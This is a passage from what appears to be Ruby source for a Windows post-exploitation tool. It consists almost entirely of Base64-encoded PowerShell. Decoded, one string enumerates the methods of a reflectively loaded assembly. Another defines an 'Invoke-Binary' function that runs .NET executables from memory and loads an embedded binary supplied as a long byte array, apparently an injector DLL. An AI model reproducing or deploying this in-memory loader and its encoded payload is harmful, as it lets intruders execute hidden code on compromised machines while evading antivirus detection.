GRsbC4uLiIKICAgICAgICAgICAgJGFzc2VtYmx5X2xvYWRlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRsbCkKICAgICAgICAgICAgJG9iaiA9ICgoJGFzc2VtYmx5X2xvYWRlZC5HZXRFeHBvcnRlZFR5cGVzKCkgfCBTZWxlY3QtT2JqZWN0IERlY2xhcmVkTWV0aG9kcyApLkRlY2xhcmVkTWV0aG9kcyB8IFdoZXJlLU9iamVjdCB7JF8uaXNwdWJsaWMgLWVxICR0cnVlfSB8IFNlbGVjdC1PYmplY3QgRGVjbGFyaW5nVHlwZSxuYW1lIC1VbmlxdWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUgKQogICAgICAgICAgICBbYXJyYXldJG1ldGhvZHMgPSBmb3JlYWNoICgkYXNzZW1ibHlwcm9wZXJ0aWVzIGluICRvYmopIHsgJG5hbWVzcGFjZSA9ICRhc3NlbWJseXByb3BlcnRpZXMuRGVjbGFyaW5nVHlwZS50b3N0cmluZygpOyAkbWV0b2RvID0gJGFzc2VtYmx5cHJvcGVydGllcy5uYW1lLnRvc3RyaW5nKCk7ICJbIiArICRuYW1lc3BhY2UgKyAiXSIgKyAiOjoiICsgJG1ldG9kbyArICIoKSIgfQogICAgICAgICAgICAkbWV0aG9kcyA9ICRtZXRob2RzIHwgU2VsZWN0LU9iamVjdCAtVW5pcXVlIDsgJGdsb2JhbDpzaG93bWV0aG9kcyA9ICAgKCRtZXRob2RzfCB3aGVyZSB7ICRnbG9iYWw6c2hvd21ldGhvZHMgIC1ub3Rjb250YWlucyAkX30pIHwgZm9yZWFjaCB7IiRfYG4ifQogICAgICAgICAgICAKICAgICAgICB9CiAgICB9Cn0=') 1122 | invokeBin = Base64.decode64('ZnVuY3Rpb24gSW52b2tlLUJpbmFyeSB7cGFyYW0oJGFyZykKICAgICRoZWxwPUAiCi5TWU5PUFNJUwogICAgRXhlY3V0ZSBiaW5hcmllcyBmcm9tIG1lbW9yeS4KICAgIFBvd2VyU2hlbGwgRnVuY3Rpb246IEludm9rZS1CaW5hcnkKICAgIEF1dGhvcjogTHVpcyBWYWNhcyAoQ3liZXJWYWNhKQoKICAgIFJlcXVpcmVkIGRlcGVuZGVuY2llczogTm9uZQogICAgT3B0aW9uYWwgZGVwZW5kZW5jaWVzOiBOb25lCi5ERVNDUklQVElPTgogICAgCi5FWEFNUExFCiAgICBJbnZva2UtQmluYXJ5IC9vcHQvY3NoYXJwL1dhdHNvbi5leGUKICAgIEludm9rZS1CaW5hcnkgL29wdC9jc2hhcnAvQmluYXJ5LmV4ZSBwYXJhbTEscGFyYW0yLHBhcmFtMwogICAgSW52b2tlLUJpbmFyeSAvb3B0L2NzaGFycC9CaW5hcnkuZXhlICdwYXJhbTEsIHBhcmFtMiwgcGFyYW0zJwogICAgRGVzY3JpcHRpb24KICAgIC0tLS0tLS0tLS0tCiAgICBGdW5jdGlvbiB0aGF0IGV4ZWN1dGUgYmluYXJpZXMgZnJvbSBtZW1vcnkuCgoKIkAKaWYgKCRhcmcgLWVxICRudWxsKSB7JGhlbHB9IGVsc2UgewpbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV1AKDc3LCA5MCwgMTQ0LCAwLCAzLCAwLCAwLCAwLCA0LCAwLCAwLCAwLCAyNTUsIDI1NSwgMCwgMCwgMTg0LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCA2NCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMTI4LCAwLCAwLCAwLCAxNCwgMzEsIDE4NiwgMTQsIDAsIDE4MCwgOSwgMjA1LCAzMywgMTg0LCAxLCA3NiwgMjA1LCAzMywgODQsIDEwNCwgMTA1LCAxMTUsIDMyLCAxMTIsIDExNCwgMTExLCAxMDMsIDExNCwgOTcsIDEwOSwgMzIsIDk5LCA5NywgMTEwLCAxMTAsIDExMSwgMTE2LCAzMiwgOTgsIDEwMSwgMzIsIDExNCwgMTE3LCAxMTAsIDMyLCAxMDUsIDExMCwgMzIsIDY4LCA3OSwgODMsIDMyLCAxMDksIDExMSwgMTAwLCAxMDEsIDQ2LCAxMywgMTMsIDEwLCAzNiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgODAsIDY5LCAwLCAwLCA3NiwgMSwgMywgMCwgMjQ1LCAxODIsIDIzMSwgOTIsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDIyNCwgMCwgMiwgMzMsIDExLCAxLCAxMSwgMCwgMCwgMTAsIDAsIDAsIDAsIDYsIDAsIDAsIDAsIDAsIDAsIDAsIDk0LCA0MSwgMCwgMCwgMCwgMzIsIDAsIDAsIDAsIDY0LCAwLCAwLCAwLCAwLCAwLCAxNiwgMCwgMzIsIDAsIDAsIDAsIDIsIDAsIDAsIDQsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDYsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDEyOCwgMCwgMCwgMCwgMiwgMCwgMCwgMCwgMCwgMCwgMCwgMywgMCwgOTYsIDEzMywgMCwgMCwgMTYsIDAsIDAsIDE2LCAwLCAwLCAwLCAwLCAxNiwgMCwgMCwgMTYsIDAsIDAsIDAsIDAsIDAsIDAsIDE2LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAxMiwgNDEsIDAsIDAsIDc5LCAwLCAwLCAwLCAwLCA2NCwgMCwgMCwgNDAsIDMsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDk2LCAwLCAwLCAxMiwgMCwgMCwgMCwgMjEyLCAzOSwgMCwgMCwgMjgsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDMyLCAwLCAwLCA4LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCA4LCAzMiwgMCwgMCwgNzIsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDQ2LCAxMTYsIDEwMSwgMTIwLCAxMTYsIDAsIDAsIDAsIDEwMCwgOSwgMCwgMCwgMCwgMzIsIDAsIDAsIDAsIDEwLCAwLCAwLCAwLCAyLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAzMiwgMCwgMCwgOTYsIDQ2LCAxMTQsIDExNSwgMTE0LCA5OSwgMCwgMCwgMCwgNDAsIDMsIDAsIDAsIDAsIDY0LCAwLCAwLCAwLCA0LCAwLCAwLCAwLCAxMiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNjQsIDAsIDAsIDY0LCA0NiwgMTE0LCAxMDEsIDEwOCwgMTExLCA5OSwgMCwgMCwgMTIsIDAsIDAsIDAsIDAsIDk2LCAwLCAwLCAwLCAyLCAwLCAwLCAwLCAxNiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNjQsIDAsIDAsIDY2LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCA2NCwgNDEsIDAsIDAsIDAsIDAsIDAsIDAsIDcyLCAwLCAwLCAwLCAyLCAwLCA1LCAwLCAxOTYsIDMyLCAwLCAwLCAxNiwgNywgMCwgMCwgMSwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMTksIDQ4LCA2LCAwLCAxMDQsIDAsIDAsIDAsIDEsIDAsIDAsIDE3LCAwLCAxMTUsIDE1LCAwLCAwLCAxMCwgMTAsIDYsIDQwLCAxNiwgMCwgMCwgMTAsIDAsIDYsIDQwLCAxNywgMCwgMCwgMTAsIDAsIDIsIDIyLCAxNTQsIDExMSwgMTgsIDAsIDAsIDEwLCAxMSwgNywgNDAsIDE5LCAwLCAwLCAxMCwgMTIsIDgsIDQwLCAyMCwgMCwgMCwgMTAsIDEzLCA5LCAxMTEsIDIxLCAwLCAwLCAxMCwgMTksIDQsIDE3LCA0LCAyMCwgMjMsIDE0MSwgMSwgMCwgMCwgMSwgMTksIDcsIDE3LCA3LCAyMiwgMiwgMjMsIDQwLCAxLCAwLCAwLCA0MywgNDAsIDIsIDAsIDAsIDQzLCAxNjIsIDE3LCA3LCAxMTEsIDI0LCAwLCAwLCAxMCwgMzgsIDYsIDExMSwgMTgsIDAsIDAsIDEwLCAxOSwgNSwgMTcsIDUsIDE5LCA2LCA0MywgMCwgMTcsIDYsIDQyLCA2NiwgODMsIDc0LCA2NiwgMSwgMCwgMSwgMCwgMCwgMCwgMCwgMCwgMTIsIDAsIDAsIDAsIDExOCwgNTIsIDQ2LCA0OCwgNDYsIDUxLCA0OCwgNTEsIDQ5LCA1NywgMCwgMCwgMCwgMCwgNSwgMCwgMTA4LCAwLCAwLCAwLCA1NiwgMiwgMCwgMCwgMzUsIDEyNiwgMCwgMCwgMTY0LCAyLCAwLCAwLCA2OCwgMywgMCwgMCwgMzUsIDgzLCAxMTYsIDExNCwgMTA1LCAxMTAsIDEwMywgMTE1LCAwLCAwLCAwLCAwLCAyMzIsIDUsIDAsIDAsIDgsIDAsIDAsIDAsIDM1LCA4NSwgODMsIDAsIDI0MCwgNSwgMCwgMCwgMTYsIDAsIDAsIDAsIDM1LCA3MSwgODUsIDczLCA2OCwgMCwgMCwgMCwgMCwgNiwgMCwgMCwgMTYsIDEsIDAsIDAsIDM1LCA2NiwgMTA4LCAxMTEsIDk4LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAyLCAwLCAwLCAxLCA3MSwgMjEsIDIsIDAsIDksIDgsIDAsIDAsIDAsIDI1MCwgMzcsIDUxLCAwLCAyMiwgMCwgMCwgMSwgMCwgMCwgMCwgMjUsIDAsIDAsIDAsIDIsIDAsIDAsIDAsIDEsIDAsIDAsIDAsIDEsIDAsIDAsIDAsIDI0LCAwLCAwLCAwLCAxMiwgMCwgMCwgMCwgMSwgMCwgMCwgMCwgMSwgMCwgMCwgMCwgMiwgMCwgMCwgMCwgMiwgMCwgMCwgMCwgMCwgMCwgMTAsIDAsIDEsIDAsIDAsIDAsIDAsIDAsIDYsIDAsIDU1LCAwLCA0OCwgMCwgNiwgMCwgMTAxLCAwLCA3NSwgMCwgNiwgMCwgMTUwLCAwLCAxMzIsIDAsIDYsIDAsIDE3MywgMCwgMTMyLCAwLCA2LCAwLCAyMDIsIDAsIDEzMiwgMCwgNiwgMCwgMjMzLCAwLCAxMzIsIDAsIDYsIDAsIDIsIDEsIDEzMiwgMCwgNiwgMCwgMjcsIDEsIDEzMiwgMCwgNiwgMCwgNTQsIDEsIDEzMiwgMCwgNiwgMCwgODEsIDEsIDEzMiwgMCwgNiwgMCwgMTM3LCAxLCAxMDYsIDEsIDYsIDAsIDE1NywgMSwgMTMyLCAwLCA2LCAwLCAyMDEsIDEsIDE4MiwgMSwgNTUsIDAsIDIyMSwgMSwgMCwgMCwgNiwgMCwgMTIsIDIsIDIzNiwgMSwgNiwgMCwgNDQsIDIsIDIzNiwgMSwgNiwgMCwgOTIsIDIsIDgyLCAyLCA2LCAwLCAxMDUsIDIsIDQ4LCAwLCA2LCAwLCAxMTMsIDIsIDgyLCAyLCA2LCAwLCAxNDksIDIsIDQ4LCAwLCA2LCAwLCAxNzQsIDIsIDEzMiwgMCwgNiwgMCwgMTg4LCAyLCAxMzIsIDAsIDEwLCAwLCAyMzgsIDIsIDIyNiwgMiwgNiwgMCwgMjAsIDMsIDI0OSwgMiwgNiwgMCwgNDcsIDMsIDEzMiwgMCwgMCwgMCwgMCwgMCwgMSwgMCwgMCwgMCwgMCwgMCwgMSwgMCwgMSwgMCwgMTI5LCAxLCAxNiwgMCwgMjIsIDAsIDMxLCAwLCA1LCAwLCAxLCAwLCAxLCAwLCA4MCwgMzIsIDAsIDAsIDAsIDAsIDE1MCwgMCwgNjIsIDAsIDEwLCAwLCAxLCAwLCAwLCAwLCAxLCAwLCA3MCwgMCwgMTcsIDAsIDEyNiwgMCwgMTYsIDAsIDI1LCAwLCAxMjYsIDAsIDE2LCAwLCAzMywgMCwgMTI2LCAwLCAxNiwgMCwgNDEsIDAsIDEyNiwgMCwgMTYsIDAsIDQ5LCAwLCAxMjYsIDAsIDE2LCAwLCA1NywgMCwgMTI2LCAwLCAxNiwgMCwgNjUsIDAsIDEyNiwgMCwgMTYsIDAsIDczLCAwLCAxMjYsIDAsIDE2LCAwLCA4MSwgMCwgMTI2LCAwLCAxNiwgMCwgODksIDAsIDEyNiwgMCwgMjEsIDAsIDk3LCAwLCAxMjYsIDAsIDE2LCAwLCAxMDUsIDAsIDEyNiwgMCwgMjYsIDAsIDEyMSwgMCwgMTI2LCAwLCAzMiwgMCwgMTI5LCAwLCAxMjYsIDAsIDM3LCAwLCAxMzcsIDAsIDEyNiwgMCwgMzcsIDAsIDE0NSwgMCwgMTI0LCAyLCA0MSwgMCwgMTQ1LCAwLCAxMzEsIDIsIDQxLCAwLCA5LCAwLCAxNDAsIDIsIDQ3LCAwLCAxNjEsIDAsIDE1NywgMiwgNTEsIDAsIDE2OSwgMCwgMTgzLCAyLCA1NywgMCwgMTY5LCAwLCAxOTksIDIsIDY0LCAwLCAxODUsIDAsIDM0LCAzLCA2OSwgMCwgMTg1LCAwLCAzOSwgMywgOTAsIDAsIDIwMSwgMCwgNTgsIDMsIDEwMywgMCwgNDYsIDAsIDExLCAwLCAxMjYsIDAsIDQ2LCAwLCAxOSwgMCwgMTgyLCAwLCA0NiwgMCwgMjcsIDAsIDE5NSwgMCwgNDYsIDAsIDM1LCAwLCAxOTUsIDAsIDQ2LCAwLCA0MywgMCwgMTk1LCAwLCA0NiwgMCwgNTEsIDAsIDE4MiwgMCwgNDYsIDAsIDU5LCAwLCAyMDEsIDAsIDQ2LCAwLCA2NywgMCwgMTk1LCAwLCA0NiwgMCwgODMsIDAsIDE5NSwgMCwgNDYsIDAsIDk5LCAwLCAyMjEsIDAsIDQ2LCAwLCAxMDcsIDAsIDIzMCwgMCwgNDYsIDAsIDExNSwgMCwgMjM5LCAwLCAxMTAsIDAsIDQsIDEyOCwgMCwgMCwgMSwgMCwgMCwgMCwgMTcxLCAyNywgMTMwLCA3MiwgMCwgMCwgMCwgMCwgMCwgMCwgNzQsIDIsIDAsIDAsIDQsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDEsIDAsIDM5LCAwLCAwLCAwLCAwLCAwLCA0LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAxLCAwLCAyMTQsIDIsIDAsIDAsIDAsIDAsIDQ1LCAwLCA4NiwgMCwgNDcsIDAsIDg2LCAwLCAwLCAwLCAwLCAwLCAwLCA2MCwgNzcsIDExMSwgMTAwLCAxMTcsIDEwOCwgMTAxLCA2MiwgMCwgOTksIDk3LCA5OCwgMTAxLCAxMTUsIDEwNCwgOTcsIDQ2LCAxMDAsIDEwOCwgMTA4LCAwLCA3MywgMTEwLCAxMDYsIDEwMSwgOTksIDExNiwgMTExLCAxMTQsIDAsIDY3LCA5NywgOTgsIDEwMSwgMTE1LCAxMDQsIDk3LCAwLCAxMDksIDExNSwgOTksIDExMSwgMTE0LCAxMDgsIDEwNSwgOTgsIDAsIDgzLCAxMjEsIDExNSwgMTE2LCAxMDEsIDEwOSwgMCwgNzksIDk4LCAxMDYsIDEwMSwgOTksIDExNiwgMCwgNjksIDEyMCwgMTAxLCA5OSwgMTE3LCAxMTYsIDEwMSwgMCwgOTcsIDExNCwgMTAzLCAxMTUsIDAsIDgzLCAxMjEsIDExNSwgMTE2LCAxMDEsIDEwOSwgNDYsIDgyLCAxMTcsIDExMCwgMTE2LCAxMDUsIDEwOSwgMTAxLCA0NiwgODYsIDEwMSwgMTE0LCAxMTUsIDEwNSwgMTExLCAxMTAsIDEwNSwgMTEwLCAxMDMsIDAsIDg0LCA5NywgMTE0LCAxMDMsIDEwMSwgMTE2LCA3MCwgMTE0LCA5NywgMTA5LCAxMDEsIDExOSwgMTExLCAxMTQsIDEwNywgNjUsIDExNiwgMTE2LCAxMTQsIDEwNSwgOTgsIDExNywgMTE2LCAxMDEsIDAsIDQ2LCA5OSwgMTE2LCAxMTEsIDExNCwgMCwgODMsIDEyMSwgMTE1LCAxMTYsIDEwMSwgMTA5LCA0NiwgODIsIDEwMSwgMTAyLCAxMDgsIDEwMSwgOTksIDExNiwgMTA1LCAxMTEsIDExMCwgMCwgNjUsIDExNSwgMTE1LCAxMDEsIDEwOSwgOTgsIDEwOCwgMTIxLCA4NCwgMTA1LCAxMTYsIDEwOCwgMTAxLCA2NSwgMTE2LCAxMTYsIDExNCwgMTA1LCA5OCwgMTE3LCAxMTYsIDEwMSwgMCwgNjUsIDExNSwgMTE1LCAxMDEsIDEwOSwgOTgsIDEwOCwgMTIxLCA2OCwgMTAxLCAxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYsIDEwNSwgMTExLCAxMTAsIDY1LCAxMTYsIDExNiwgMTE0LCAxMDUsIDk4LCAxMTcsIDExNiwgMTAxLCAwLCA2NSwgMTE1LCAxMTUsIDEwMSwgMTA5LCA5OCwgMTA4LCAxMjEsIDY3LCAxMTEsIDExMCwgMTAyLCAxMDUsIDEwMywgMTE3LCAxMTQsIDk3LCAxMTYsIDEwNSwgMTExLCAxMTAsIDY1LCAxMTYsIDExNiwgMTE0LCAxMDUsIDk4LCAxMTcsIDExNiwgMTAxLCAwLCA2NSwgMTE1LCAxMTUsIDEwMSwgMTA5LCA5OCwgMTA4LCAxMjEsIDY3LCAxMTEsIDEwOSwgMTEyLCA5NywgMTEwLCAxMjEsIDY1LCAxMTYsIDExNiwgMTE0LCAxMDUsIDk4LCAxMTcsIDExNiwgMTAxLCAwLCA2NSwgMTE1LCAxMTUsIDEwMSwgMTA5LCA5OCwgMTA4LCAxMjEsIDgwLCAxMTQsIDExMSwgMTAwLCAxMTcsIDk5LCAxMTYsIDY1LCAxMTYsIDExNiwgMTE0LCAxMDUsIDk4LCAxMTcsIDExNiwgMTAxLCAwLCA2NSwgMTE1LCAxMTUsIDEwMSwgMTA5LCA5OCwgMTA4LCAxMjEsIDY3LCAxMTEsIDExMiwgMTIxLCAxMTQsIDEwNSwgMTAzLCAxMDQsIDExNiwgNjUsIDExNiwgMTE2LCAxMTQsIDEwNSwgOTgsIDExNywgMTE2LCAxMDEsIDAsIDY1LCAxMTUsIDExNSwgMTAxLCAxMDksIDk4LCAxMDgsIDEyMSwgODQsIDExNCwgOTcsIDEwMCwgMTAxLCAxMDksIDk3LCAxMTQsIDEwNywgNjUsIDExNiwgMTE2LCAxMTQsIDEwNSwgOTgsIDExNywgMTE2LCAxMDEsIDAsIDY1LCAxMTUsIDExNSwgMTAxLCAxMDksIDk4LCAxMDgsIDEyMSwgNjcsIDExNywgMTA4LCAxMTYsIDExNywgMTE0LCAxMDEsIDY1LCAxMTYsIDExNiwgMTE0LCAxMDUsIDk4LCAxMTcsIDExNiwgMTAxLCAwLCA4MywgMTIxLCAxMTUsIDExNiwgMTAxLCAxMDksIDQ2LCA4MiwgMTE3LCAxMTAsIDExNiwgMTA1LCAxMDksIDEwMSwgNDYsIDczLCAxMTAsIDExNiwgMTAxLCAxMTQsIDExMSwgMTEyLCA4MywgMTAxLCAxMTQsIDExOCwgMTA1LCA5OSwgMTAxLCAxMTUsIDAsIDY3LCAxMTEsIDEwOSwgODYsIDEwNSwgMTE1LCAxMDUsIDk4LCAxMDgsIDEwMSwgNjUsIDExNiwgMTE2LCAxMTQsIDEwNSwgOTgsIDExNywgMTE2LCAxMDEsIDAsIDY1LCAxMTUsIDExNSwgMTAxLCAxMDksIDk4LCAxMDgsIDEyMSwgODYsIDEwMSwgMTE0LCAxMTUsIDEwNSwgMTExLCAxMTAsIDY1LCAxMTYsIDExNiwgMTE0LCAxMDUsIDk4LCAxMTcsIDExNiwgMTAxLCAwLCA4MywgMTIxLCAxMTUsIDExNiwgMTAxLCAxMDksIDQ2LCA2OCwgMTA1LCA5NywgMTAzLCAxMTAsIDExMSwgMTE1LCAxMTYsIDEwNSwgOTksIDExNSwgMCwgNjgsIDEwMSwgOTgsIDExNywgMTAzLCAxMDMsIDk3LCA5OCwgMTA4LCAxMDEsIDY1LCAxMTYsIDExNiwgMTE0LCAxMDUsIDk4LCAxMTcsIDExNiwgMTAxLCAwLCA2OCwgMTAxLCA5OCwgMTE3LCAxMDMsIDEwMywgMTA1LCAxMTAsIDEwMywgNzcsIDExMSwgMTAwLCAxMDEsIDExNSwgMCwgODMsIDEyMSwgMTE1LCAxMTYsIDEwMSwgMTA5LCA0NiwgODIsIDExNywgMTEwLCAxMTYsIDEwNSwgMTA5LCAxMDEsIDQ2LCA2NywgMTExLCAxMDksIDExMiwgMTA1LCAxMDgsIDEwMSwgMTE0LCA4MywgMTAxLCAxMTQsIDExOCwgMTA1LCA5OSwgMTAxLCAxMTUsIDAsIDY3LCAxMTEsIDEwOSwgMTEyLCAxMDUsIDEwOCwgOTcsIDExNiwgMTA1LCAxMTEsIDExMCwgODIsIDEwMSwgMTA4LCA5NywgMTIwLCA5NywgMTE2LCAxMDUsIDExMSwgMTEwLCAxMTUsIDY1LCAxMTYsIDExNiwgMTE0LCAxMDUsIDk4LCAxMTcsIDExNiwgMTAxLCAwLCA4MiwgMTE3LCAxMTAsIDExNiwgMTA1LCAxMDksIDEwMSwgNjcsIDExMSwgMTA5LCAxMTIsIDk3LCAxMTYsIDEwNSwgOTgsIDEwNSwgMTA4LCAxMDUsIDExNiwgMTIxLCA2NSwgMTE2LCAxMTYsIDExNCwgMTA1LCA5OCwgMTE3LCAxMTYsIDEwMSwgMCwgOTksIDk3LCA5OCwgMTAxLCAxMTUsIDEwNCwgOTcsIDAsIDgzLCAxMjEsIDExNSwgMTE2LCAxMDEsIDEwOSwgNDYsIDczLCA3OSwgMCwgODMsIDExNiwgMTE0LCAxMDUsIDExMCwgMTAzLCA4NywgMTE0LCAxMDUsIDExNiwgMTAxLCAxMTQsIDAsIDY3LCAxMTEsIDExMCwgMTE1LCAxMTEsIDEwOCwgMTAxLCAwLCA4NCwgMTAxLCAxMjAsIDExNiwgODcsIDExNCwgMTA1LCAxMTYsIDEwMSwgMTE0LCAwLCA4MywgMTAxLCAxMTYsIDc5LCAxMTcsIDExNiwgMCwgODMsIDEwMSwgMTE2LCA2OSwgMTE0LCAxMTQsIDExMSwgMTE0LCAwLCA4NCwgMTExLCA4MywgMTE2LCAxMTQsIDEwNSwgMTEwLCAxMDMsIDAsIDY3LCAxMTEsIDExMCwgMTE4LCAxMDEsIDExNCwgMTE2LCAwLCA3MCwgMTE0LCAxMTEsIDEwOSwgNjYsIDk3LCAxMTUsIDEwMSwgNTQsIDUyLCA4MywgMTE2LCAxMTQsIDEwNSwgMTEwLCAxMDMsIDAsIDY1LCAxMTUsIDExNSwgMTAxLCAxMDksIDk4LCAxMDgsIDEyMSwgMCwgNzYsIDExMSwgOTcsIDEwMCwgMCwgNzcsIDEwMSwgMTE2LCAxMDQsIDExMSwgMTAwLCA3MywgMTEwLCAxMDIsIDExMSwgMCwgMTAzLCAxMDEsIDExNiwgOTUsIDY5LCAxMTAsIDExNiwgMTE0LCAxMjEsIDgwLCAxMTEsIDEwNSwgMTEwLCAxMTYsIDAsIDgzLCAxMjEsIDExNSwgMTE2LCAxMDEsIDEwOSwgNDYsIDY3LCAxMTEsIDExNCwgMTAxLCAwLCA4MywgMTIxLCAxMTUsIDExNiwgMTAxLCAxMDksIDQ2LCA3NiwgMTA1LCAxMTAsIDExMywgMCwgNjksIDExMCwgMTE3LCAxMDksIDEwMSwgMTE0LCA5NywgOTgsIDEwOCwgMTAxLCAwLCA4MywgMTIxLCAxMTUsIDExNiwgMTAxLCAxMDksIDQ2LCA2NywgMTExLCAxMDgsIDEwOCwgMTAxLCA5OSwgMTE2LCAxMDUsIDExMSwgMTEwLCAxMTUsIDQ2LCA3MSwgMTAxLCAxMTAsIDEwMSwgMTE0LCAxMDUsIDk5LCAwLCA3MywgNjksIDExMCwgMTE3LCAxMDksIDEwMSwgMTE0LCA5NywgOTgsIDEwOCwgMTAxLCA5NiwgNDksIDAsIDgzLCAxMDcsIDEwNSwgMTEyLCAwLCA4NCwgMTExLCA2NSwgMTE0LCAxMTQsIDk3LCAxMjEsIDAsIDc3LCAxMDEsIDExNiwgMTA0LCAxMTEsIDEwMCwgNjYsIDk3LCAxMTUsIDEwMSwgMCwgNzMsIDExMCwgMTE4LCAxMTEsIDEwNywgMTAxLCAwLCAwLCAwLCAwLCAwLCAzLCAzMiwgMCwgMCwgMCwgMCwgMCwgMzUsIDE4MSwgMjAsIDIzNywgMTc4LCAyMiwgMjA1LCA3NCwgMTQ1LCA5NSwgMTcxLCAzMSwgMjI0LCAyNTEsIDIyNSwgMTYzLCAwLCA4LCAxODMsIDEyMiwgOTIsIDg2LCAyNSwgNTIsIDIyNCwgMTM3LCA1LCAwLCAxLCAxNCwgMjksIDE0LCA0LCAzMiwgMSwgMSwgMTQsIDQsIDMyLCAxLCAxLCAyLCA1LCAzMiwgMSwgMSwgMTcsIDU3LCA0LCAzMiwgMSwgMSwgOCwgMywgMzIsIDAsIDEsIDUsIDAsIDEsIDEsIDE4LCA3NywgMywgMzIsIDAsIDE0LCA1LCAwLCAxLCAyOSwgNSwgMTQsIDYsIDAsIDEsIDE4LCA4NSwgMjksIDUsIDQsIDMyLCAwLCAxOCwgODksIDE2LCAxNiwgMSwgMiwgMjEsIDE4LCA5NywgMSwgMzAsIDAsIDIxLCAxOCwgOTcsIDEsIDMwLCAwLCA4LCAzLCAxMCwgMSwgMTQsIDEyLCAxNiwgMSwgMSwgMjksIDMwLCAwLCAyMSwgMTgsIDk3LCAxLCAzMCwgMCwgNiwgMzIsIDIsIDI4LCAyOCwgMjksIDI4LCAxNSwgNywgOCwgMTgsIDY5LCAxNCwgMjksIDUsIDE4LCA4NSwgMTgsIDg5LCAxNCwgMTQsIDI5LCAyOCwgNTUsIDEsIDAsIDI2LCA0NiwgNzgsIDY5LCA4NCwgNzAsIDExNCwgOTcsIDEwOSwgMTAxLCAxMTksIDExMSwgMTE0LCAxMDcsIDQ0LCA4NiwgMTAxLCAxMTQsIDExNSwgMTA1LCAxMTEsIDExMCwgNjEsIDExOCwgNTIsIDQ2LCA1MywgMSwgMCwgODQsIDE0LCAyMCwgNzAsIDExNCwgOTcsIDEwOSwgMTAxLCAxMTksIDExMSwgMTE0LCAxMDcsIDY4LCAxMDUsIDExNSwgMTEyLCAxMDgsIDk3LCAxMjEsIDc4LCA5NywgMTA5LCAxMDEsIDAsIDEyLCAxLCAwLCA3LCA5OSwgOTcsIDk4LCAxMDEsIDExNSwgMTA0LCA5NywgMCwgMCwgNSwgMSwgMCwgMCwgMCwgMCwgMTksIDEsIDAsIDE0LCA2NywgMTExLCAxMTIsIDEyMSwgMTE0LCAxMDUsIDEwMywgMTA0LCAxMTYsIDMyLCA1MCwgNDgsIDQ5LCA1NywgMCwgMCwgOCwgMSwgMCwgNywgMSwgMCwgMCwgMCwgMCwgOCwgMSwgMCwgOCwgMCwgMCwgMCwgMCwgMCwgMzAsIDEsIDAsIDEsIDAsIDg0LCAyLCAyMiwgODcsIDExNCwgOTcsIDExMiwgNzgsIDExMSwgMTEwLCA2OSwgMTIwLCA5OSwgMTAxLCAxMTIsIDExNiwgMTA1LCAxMTEsIDExMCwgODQsIDEwNCwgMTE0LCAxMTEsIDExOSwgMTE1LCAxLCAwLCAwLCAwLCAwLCAwLCAwLCAyNDUsIDE4MiwgMjMxLCA5MiwgMCwgMCwgMCwgMCwgMiwgMCwgMCwgMCwgMjgsIDEsIDAsIDAsIDI0MCwgMzksIDAsIDAsIDI0MCwgOSwgMCwgMCwgODIsIDgzLCA2OCwgODMsIDE4MSwgMTUsIDE1OSwgOCwgMjExLCAyMzUsIDE5NywgNzIsIDEzMiwgNTMsIDg3LCAxMTcsIDE5NSwgNTQsIDE1MywgMTk2LCAzLCAwLCAwLCAwLCA5OSwgNTgsIDkyLCA4NSwgMTE1LCAxMDEsIDExNCwgMTE1LCA5MiwgMTEzLCA1MiwgNTYsIDU3LCA1MCwgNTMsIDQ4LCA0OSwgNTYsIDkyLCA2OCwgMTExLCA5OSwgMTE3LCAxMDksIDEwMSwgMTEwLCAxMTYsIDExNSwgOTIsIDgzLCAxMDQsIDk3LCAxMTQsIDExMiwgNjgsIDEwMSwgMTE4LCAxMDEsIDEwOCwgMTExLCAxMTIsIDMyLCA4MCwgMTE0LCAxMTEsIDEwNiwgMTAxLCA5OSwgMTE2LCAxMTUsIDkyLCA5OSwgOTcsIDk4LCAxMDEsIDExNSwgMTA0LCA5NywgOTI